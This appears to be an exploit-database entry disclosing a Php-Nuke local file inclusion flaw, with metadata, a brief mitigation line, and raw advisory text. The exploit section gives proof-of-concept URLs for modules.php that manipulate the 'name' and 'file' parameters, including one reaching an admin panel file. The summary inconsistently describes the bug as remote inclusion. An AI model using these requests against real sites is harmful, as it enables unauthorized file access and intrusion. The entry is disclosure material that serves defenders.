Php-Nuke Local File Include Vulnerability

vendor:

Php-Nuke

by:

ItSecTeam

7,5

CVSS

HIGH

Local File Include Vulnerability

CWE

Product Name: Php-Nuke

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Php-Nuke Local File Include Vulnerability

A vulnerability in Php-Nuke allows an attacker to include a remote file via the 'name' and 'file' parameters in the 'modules.php' script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

Update to the latest version of Php-Nuke.

Source

Exploit-DB raw data:

=======================================================================================
Topic : Php-Nuke
Bug type : Local File Include Vulnerability
Author : ItSecTeam
Remote : Yes
Status : Bug
===================== Content ======================
( # Advisory Content : Php-Nuke Lastest Version
( # Mail : Bug@ItSecTeam.com
( # Dork : Php-Nuke Lastest Version
( # We Are : M3hr@n.S , 0xd41684c654 And All Team Members!
( # Website : WwW.ItSecTeam.com<http://www.itsecteam.com/>
( # Forum : WwW.Forum.ItSecTeam.com<http://www.itsecteam.com/>
( # Find By : Amin Shokohi(Pejvak!)
=================================================
============================================= Exploit =======================================
( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name
( Ex : http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Content/admin&file=panel
==========================================================================================